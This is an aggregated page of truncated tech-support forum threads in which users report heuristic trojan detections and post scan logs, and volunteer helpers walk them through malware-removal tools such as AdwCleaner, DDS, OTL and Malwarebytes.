Hello PSL649, I would like to welcome you to the Malware Removal section of the forum. Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely. I have spent my time to put together some things for you to keep in mind while I am helping you, to make things go easier, faster and smoother for both of us!

Please do not run any tools unless instructed to do so. We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text. Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything. Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go. A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ... Read more

A:HEUR.Trojan.Win32.Generic.

Gringo,
 
JRT will not run. I tried to run this yesterday, let it sit for 5 hours and no report. Tried to run it in user mode, does not run like that either. After running the AdwCleaner my fan speed had returned to normal and the system seems to be normal also. The svchosts.exe (LocalServiceNoImpersonation) has normalized and is not pegging at 99% anymore & svchosts.exe (LocalServicePeerNet) is no longer seen (which was also at 99%).
 
Here is the AdwCleaner Report:
 
# AdwCleaner v3.022 - Report created 22/03/2014 at 00:41:58
# Updated 13/03/2014 by Xplode
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : d15k0n - AZZA
# Running from : C:\Users\d15k0n\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Users\d15k0n\Documents\Mobogenie
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16521
 
 
-\\ Mozilla Firefox v27.0.1 (en-US)
 
[ Fil... Read more

22 more replies
Answer Match 51.66%

I do not know how to get this virus off my computer. The file name is Inchtour.exe - it makes my disc drive open on its own, and has taken over my Bit Defender account. It will not even start my Bit Defender program unless I go into the settings and specifically watch the antivirus settings section. There is no specific message that I receive from the Bit Defender program, but it tells me that I have 3 viruses that cannot be removed.
DDS (Ver_09-03-16.01) - NTFSx86
Run by Heidi Cote at 23:01:23.35 on 25/04/2009
Internet Explorer: 7.0.6001.18000
Microsoft? Windows Vista? Home Premium 6.0.6001.1.1252.2.1033.18.3006.1817 [GMT -4:00]

AV: Bitdefender Antivirus *On-access scanning enabled* (Updated)
FW: Bitdefender Firewall *enabled*

============== Running Processes ===============

C... Read more

A:Infected with Gen:Trojan.Heur.7E49283939

Hello Heidihatesviruses,

Please disable any running anti-virus program before running Kaspersky Online Scanner. If you are unsure how to do this, see this topic: http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/

Close any open browsers. Please do a scan with Kaspersky Online Scanner. You can refer to this animation by sundavis.

Note: If you are using Windows Vista, open your browser by right-clicking on its icon and select 'Run as administrator' to perform this scan.

Click on the Accept button and install any components it needs. The program will install and then begin downloading the latest definition files. After the files have been downloaded, on the left side of the page in the Scan section select My Computer. This will start the program and scan your system. The scan will take a while, so be patient and let it run. Once the scan is complete, click on View scan report. Now, click on the Save Report as button. In the drop down box labeled Files of type change the type to Text file. Save the file to your desktop. Copy and paste that information in your next post. This scanner will only scan. It does not remove any malware it finds.

**************

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update. Updating Java: Download the latest version of Java SE Runtime Environment (JRE) 6 Update ... Read more

2 more replies
Answer Match 51.66%

Godfadda, I need your help

All kinds of odd behaviour going on. Mousepad is touch sensitive and can't change it, Windows Defender blocked, updates blocked, browser being redirected. System restore is disabled too, which might be a good thing. Have run scans in normal and safe mode with Malwarebytes, AVG, Superantispyware - nothing seems to work: some are removed but new ones pop up. AVG shows presence of Win32/Heur but other apps have shown hundreds of others - rootkits, Virtumonde, Smitfraud. Seems to fit with Win32/Heur, from what I can tell; self-replicating.

I'm not a complete novice but I'm no whizzkid so be gentle. But boy, do I need some help!
DDS (Ver_09-03-16.01) - NTFSx86
Run by anthony at 22:56:17.32 on 21/04/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.420 [GMT 1:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\Program Files&... Read more

A:Trojan attack - win32/Heur

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run. A small box will open, with an explanation about the tool. No input is needed, the scan is running. Notepad will open with the resul... Read more

2 more replies
Answer Match 51.66%

Hi, this is a log file from a customer of mine... they have the HEUR:Trojan.Script.Generic trojan and I can't seem to remove it. They do an awful lot of online banking/deposits/accounting on that system and it seems pretty risky with this little bug... any help would be appreciated. Below are the logs I could run on their system...

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 5:24:59 PM, on 6/24/2014
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17126)
Boot mode: Normal

Running processes:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK14/1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go... Read more

A:HEUR:Trojan.Script.Generic

9 more replies
Answer Match 51.66%

ZA found heur.win32.trojan.generic this morning. The computer hasn't been "right" for about a week. Nothing major. Went looking when my monitor stopped hibernating, and Acrobat Reader and Flash would not update or work. I found that my allow remote assistance box was clicked. (I would never allow that even if such a thing was hinted at.) The above trojan is quarantined, but I do my trading from this computer and I always thought I've been careful, but now I need to make sure.

Posting the logs. I have saved the virus logs from ZA also. There was another virus last week but I didn't jot down the name, just copied the log entry from ZA. Sorry.
DDS (Ver_09-07-30.01) - NTFSx86
Run by Administrator at 15:43:48.95 on Thu 09/17/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1023.544 [GMT -5:00]

AV: ZoneAlarm Extreme Security Antivirus *On-access scanning enabled* (Updated) {5D467B10-818C-4CAB-9FF7-6893B5B8F3CF}
AV: Norton AntiVirus *On-access scanning enabled* (Outdated) {E10A9785-9598-4754-B552-92431C1C35F8}
FW: Norton Internet Worm Protection *enabled* {990F9400-4CEE-43EA-A83A-D013ADD8EA6E}
FW: ZoneAlarm Extreme Security Firewall *enabled* {829BDA32-94B3-44F4-8446-F8FCFF809F8B}

============== Running Processes ===============

C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\... Read more

A:heur.win32.trojan.generic

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run. A small box will open, with an explanation about the tool. No input is needed, the scan is running. Notepad will open with the results. Foll... Read more

2 more replies
Answer Match 51.66%

I have been cleaning up my system for a few weeks now, and it is booting and running as fast as it ever has.
Most scans have come up with tracking cookies and adware, which I clicked on remove.
Last night ZoneAlarm popped this one up as an alert
 
C:\DOCUMENTS AND SETTINGS \JERRY\DESKTOP\GUSETUP.EXE//DATA0202
HEUR Trojan Win 2 StartPage
 
 
Dds Report
 
DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 10.25.2
Run by jerry at 9:57:35 on 2013-08-12
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.3325.2366 [GMT -7:00]
.
AV: ZoneAlarm Antivirus *Enabled/Updated* {5D467B10-818C-4CAB-9FF7-6893B5B8F3CF}
FW: ZoneAlarm Firewall *Enabled*
FW: AVG Firewall *Disabled*
.
============== Running Processes ================
.
C:... Read more

A:New Za Alert, HEUR Trojan Win 2 StartPage

Good evening. C:\DOCUMENTS AND SETTINGS \JERRY\DESKTOP\GUSETUP.EXE - Can you tell me where you got this file from?
 
 
 

25 more replies
Answer Match 51.66%

I want to get into this link.. it was not like this before.. please help

A:Please Help HEUR:Trojan.Script.Iframer

You would have to exit/turn off your Kaspersky. You need to ask yourself: is it worth the risk of a serious infection to do that just to watch a second rate pirated movie?

1 more replies
Answer Match 51.66%

Someone in my family has managed to get a nasty infection on the computer. I'm unable to open Malwarebytes; the computer searches for the program and says it doesn't exist. When I try to re-download it, it gives me an error message that says "Unable to execute file" with the program name, and "CreateProcess failed; Code 2. The system cannot find the file specified." Suzezufu is now in my start up menu, and I saw that it has a registry entry, which I've had no luck getting rid of. Trojan.Heur has been quarantined by BitDefender, but BD can't get rid of it. At a loss and at wits' end, I have the DDS and ark logs. Thanks in advance for any help.

DDS (Ver_09-10-26.01) - NTFSx86
Run by Michelle at 20:40:39.95 on Thu 11/05/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_14
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.446.72 [GMT -5:00]

AV: Bitdefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: Bitdefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

C:... Read more

A:Infected with suzezufu and Trojan.Heur, maybe more

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.

Please download OTL from the following mirror: This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the button.
Two reports will open, copy and paste them in a reply here:
OTL.txt <-- Will be opened
Extra.txt <-- Will be minimized
In the upper right hand corner ... Read more

2 more replies
Answer Match 51.66%

Well, my computer has a trojan on it and it started to run slow since yesterday. I ran Spyware Hunter, AlYac, SuperAntiSpyware in safe mode but it keeps coming back, as well as some other adware and something called Trojan.clicker. I don't know what else is running differently but my computer is really slow now.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:47:42 PM, on 8/29/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16850)
Boot mode: Normal
Running processes:
C:\WINDOWS\system32\RUNDLL32.E... Read more

A:Slowed down computer Trojan.Heur

somebody please help me
 

3 more replies
Answer Match 51.66%

I performed a full deep scan with BitDefender 2009 and it found the following:

Gen Trojan Heur 25:

C:\Program Files\HP\Quickplay\QPService.exe (memory dump)
C:\Program Files\Bitdef....Bitdefender2009\seccenter.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLCapSvc.exe (memory dump)
C:\Program Files\Common Files\LightScribe\LSSrvc.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLSched.exe (memory dump)
C:\Program Files\Windows Media Player\WMPNSCFG.exe (memory dump)
C:\Program Files\Windows Media Player\wmpnetwk.exe (memory dump)
C:\windows\system32\notepad.exe (memory dump)

I have no idea what to do.. I have tried searching on removing this trojan but have not found any solid information.
If anybody could point me in the right direction or guide me it would be greatly appreciated.
Please help

A:Gen Trojan Heur 25 (memory dump)

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.
On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at th... Read more

1 more replies
Answer Match 51.66%

Hi, and thanks in advance for your help! I'm running Windows XP and accidentally clicked on a web page that immediately slowed my computer down to a crawl, so I'm pretty sure that's where the infection came from. I scanned my computer first with BitDefender and it found 16 instances of this virus. I rebooted and scanned again and it found 22 instances. I'm anxious to get rid of this thing as it's making my computer run extremely hot.

A:Infected by trojan.heur.vundo.1

Hello and welcome. Please run these next. If you have Spybot installed, temporarily disable it.

Next run ATF:
Please download ATF Cleaner by Atribune & save it to your desktop.
Double-click ATF-Cleaner.exe to run the program.
Under Main "Select Files to Delete" choose: Select All.
Click the Empty Selected button.
If you use Firefox browser click Firefox at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browser click Opera at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.
Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".

Next run MBAM:
Please download Malwarebytes Anti-Malware (v1.32) and save it to your desktop.
alternate download link 1
alternate download link 2
If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update... Read more

7 more replies
Answer Match 51.66%

For the past couple years I have been using AVG free, but within the last week I noticed a lot of viruses that couldn't be removed. So I did some research and got a subscription to BitDefender.

The first scan found a large number of infections all in the same 2 files: ebtnja.dll AND khfyxrgb.dll

I ran a scan again before posting this request, and now only the KHFYXRJB.DLL is showing up as infected. And now it's only 3 times.

BitDefender is unable to heal, delete, or quarantine the files, so I'm not sure what to do. The exact name of the infection is Gen:Trojan.Heur.544453

I haven't noticed any effects other than some slowness, and every time I log off/shut down explorer has to be ended manually.
Here's the report.. HJT I think? The required one.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:20:31 PM, on 2/3/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18372)
Boot mode: Normal

Running processes:
C... Read more

A:Can't Remove Trojan Heur from System32

Hi Welcome to TSG!!

Download ComboFix from one of these locations:

Link 1
Link 2
Link 3

**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

With malware infections being as they are today, it's strongly recommended to have the Windows Recovery Console pre-installed on your machine before doing any malware removal.

The Windows Recovery Console will allow you to boot up into a special recovery (repair) mode. This allows us to more easily help you should your computer have a problem after an attempted removal of malware. It is a simple procedure that will only take a few moments of your time.
Go to Microsoft's website => http://support.microsoft.com/kb/310994

Select the download that's appropriate for your Operating System


Download the file & save it as it is originally named.
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools.

Please note once you start ComboFix you should not click anywhere on the ComboFix window as it can cause the program to stall.

Drag the setup package onto ComboFix.exe and drop it.

Follow the prompts to start ComboFix and when prompted, agree to the End-User License Agreement to install the Microsoft Recovery Console.

At the next prompt, click 'Yes' to run the full ComboFix scan.

When the tool is finished, it ... Read more

1 more replies
Answer Match 51.66%

Hello guys. I got infected with this Trojan today. I was unable to open Chrome, explorer.exe or task manager. My Kaspersky tried to repair it, but the only solution was deleting the file. After that, I rebooted the PC and I could open Chrome and so on, but my PC is extremely slow. I don't know if Kaspersky was able to deal with the malware, if anyone could check it would be awesome.
 
Thanks in advance.

More replies
Answer Match 51.66%

I've newly acquired my mom's HP Pavilion dv6-3129nr Entertainment Notebook, running Windows 7, and have off and on checked in on it and installed Kaspersky Antivirus. I decided to do a full scan and discovered the above infection, which Kaspersky says that it did not process and is non-overwritable. See entire file below:

19.08.2015 08.41.15;Object (file) not processed.;C:\Users\Jolanta Jachimczyk\Downloads\_br __//Postal-Receipt.exe;C:\Users\Jolanta Jachimczyk\Downloads\_br __//Postal-Receipt.exe;HEUR:Trojan.Win32.Generic;Non-overwritable

I tried using a Google search which told me to use Kaspersky's TDSSKiller, but after running it, it found no infection. Since I consider myself a novice I figured I would turn to the boards before doing any more downloading of any programs. Please let me know what other information I need to provide in order to remove this infection. Thank you.
 

A:Help with HEUR.Trojan.Win32.Generic

Hello olabola,

Welcome to Tech Support Guy!

My name is Cody and I'll be helping you clean up your computer.

I will reply to your posts as soon as possible -- typically within 24 hours. I do ask that you please respond within 72 hours. If you know you will be away longer than that, I just ask for notice ahead of time.

Please do note any time differences between us. If I do not respond within 48 hours, feel free to send me a private message.

====================================================

Some points for you to keep in mind:

Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Copy and paste scan results unless asked to attach to a reply.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end with some additional information on how to stay malware-free.
====================================================

If possible, run the following while within Windows normally. If that is not possible, try from within Safe Mode.

Farbar Recovery Scan Tool (FRST)

Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save... Read more


Hi there. I first noticed the problem when conducting a search via Chrome browser. The link I clicked on was redirected to a different site. I ran full scans with MSE, SpybotS&D, Avast, AVG, Kaspersky, and Malwarebytes. Several of these, including Malwarebytes and Spybot indicated a virus and removed it, but the browser issue persisted. Kaspersky showed "HEUR:Trojan" in its report.

Please see log file as requested below. I've also pasted the report from Kaspersky's free scan product.

Thanks in advance for the help.

DDS Log
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 8.0.7600.17153 BrowserJavaVersion: 10.9.2
Run by Acer at 19:36:29 on 2013-01-29
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3764.1188 [GMT -5:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
AV: Microsoft Security Essentials *Enabled/Updated* {B140BF4E-23BB-4198-90AB-A51A4C60A69C}
SP: Microsoft Security Essentials *Enabled/Updated* {0A215EAA-0581-4E16-AA1B-9E6837E7EC21}
SP: avast! Antivirus *Enabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows&#... Read more

A:HEUR:Trojan.Win32.Generic

Hello

These are the programs I would like you to run next; if you have any problems with these just skip it and run the next one.

AdwCleaner

Please download AdwCleaner by Xplode onto your desktop.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Delete.
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.

RogueKiller

Download & SAVE to your Desktop RogueKiller or from here
Quit all programs that you may have started. Please disconnect any USB or external drives from the computer before you run this scan!
For Vista or Windows 7, right-click and select "Run as Administrator" to start. For Windows XP, double-click to start.
Wait until Prescan has finished ... Then click on the "Scan" button.
Wait until the Status box shows "Scan Finished", then click on "Delete".
Wait until the Status box shows "Deleting Finished".
Click on "Report" and copy/paste the content of the Notepad into your next reply.
The log should be found in RKreport[1].txt on your Desktop.
Exit/Close RogueKiller.

Gringo


I am using Counterspy which identifies and quarantines this trojan, however it requires a restart to fully remove it.

Upon start up I get a screen doing a 'boot scan' with some files it is unable to delete. I am then unable to move beyond this screen after the scan and I'm forced to 'escape' the boot scan.

I have pop ups when online and am unable to use auto updater for windows despite it being set as a preference. My HJT log is below and I'd appreciate it if you could find the time to assist me.
Many thanks.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:56:13 PM, on 2/5/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\stsystra.exe
C:\Program Files\Dell\Media Experience\DMXLauncher.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Sunbelt Software\CounterSpy\SBAMTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROG... Read more

A:Battling Heur Trojan and requesting help


I run BitDefender 2009. All problems were cleaned but one. BitDefender labels this virus as Gen:trojan.heur.564.E44 It tells me the infected file is C:\WINDOWS\system32\jkkHYrOE.dll

I'm unable to delete the file and the earliest system restore point is the exact moment the file was created (6:36 pm on 2-14-09)

A portion of my most recent scan log reads as follows:

Remaining issues:
Object Name | Threat Name | Final Status
[System] => HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{801A5890-4CD6-46FF-96B6-4122589EAAE3} => C:\WINDOWS\SYSTEM32\JKKHYROE.DLL | Gen:Trojan.Heur.564E44 | Infected
C:\WINDOWS\system32\jkkHYrOE.dll | Gen:Trojan.Heur.564E44 | No action was possible
C:\WINDOWS\system32\jkkHYrOE.dll | Gen:Trojan.Heur.564E44 | No action was possible

This is slowing down my computer immensely and creating pop-up ads for fake anti-virus software every time I change a web page. Any help would be greatly appreciated. Thanks in advance.

A:Infected with Trojan.heur.564E44

Hi and welcome to BleepingComputer. Let's take a look with Malwarebytes.

The process of cleaning your computer may require temporarily disabling some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan complet... Read more


For some reason, I couldn't put the DDS to the desktop (it went to my downloads) and couldn't paste the dds.txt here as asked.
Sorry, I couldn't copy and paste it here, but the files are below.
Please advise.

A:HEUR/Modified.SystemFile trojan in user32.DLL

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
***************************************************
In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.
CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/531677 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************
If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more


Hey guys,
 
I am running Windows XP version 5.1.  Kaspersky (13.0.1.4190) has identified a variant of the HEUR Trojan.  Specifically, it is the HEUR:Exploit.java.cve-2012-0507.gen variant.  Kaspersky claims that it is impossible to disinfect.  It recommends ignoring it, which I do not think is the right answer.  There are numerous online tutorials that provide removal instructions, but I am hesitant to attempt any of them because there does not appear to be a consensus approach.  You guys helped me out back in 2010 (ridding a rather nasty infection) and I've been a big fan ever since.  Can you provide direction with this HEUR annoyance?
 
Many many thanks!
Caligula 

A:HEUR Trojan Variant Identified By Kaspersky

First clear the Java cache
 
How do I clear the Java cache?
 
 
Now go to that location to ensure that file is deleted and scan again.


My computer has been slow lately. I ran an antivirus scan and my MASM exes are infected with Trojan Horse Generic12.KDK and 4 Win32/Heur. I need some tips on keeping my computer safer, such as essential security programs and websites, as well as getting my laptop cleaned. I scanned with AVG Free.

Thank you.
 

A:Trojan Horse Generic12.KDK and 4 Win32/Heur

bump
Posted via Mobile Device
 


Please Help
My Kaspersky scan has found this virus in System Volume Information files and files from RECYCLER. I cannot upload these to Kaspersky as it says file invalid when I try.

I have run atf cleaner and superantispyware which does not detect anything. This virus seems to spread to more files each time I scan.

Thanks for your help in advance.

Here is my hijackthis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 19:41:14, on 1/10/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Adobe\Photoshop Elements 5.0\PhotoshopElementsFileAgent.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\Program Files\ScanSoft\OmniPageSE4.0\OpwareSE4.exe
C:\Program Files\Adobe\Photoshop Elements 5.0\apdproxy.exe
C:\P... Read more


Hi!
I'm a newbie here, and I'm not sure exactly how to go about this.
I do know though that a topic about this trojan was locked....
My system's a Windows 7 Ultimate 32 bit, with Windows Security Essentials and Avira! antivirus on it.
Windows Security Essentials wasn't able to catch it, but Avira! did.... in spite of that, it seemed that some of it was able to affect my laptop's system.
It's become really slow and I've been having problems trying to access the internet/ Firefox as of late, as well as turning my anti virus systems off from time to time.
This happened about 3 days ago.
Please help!
Thank you.
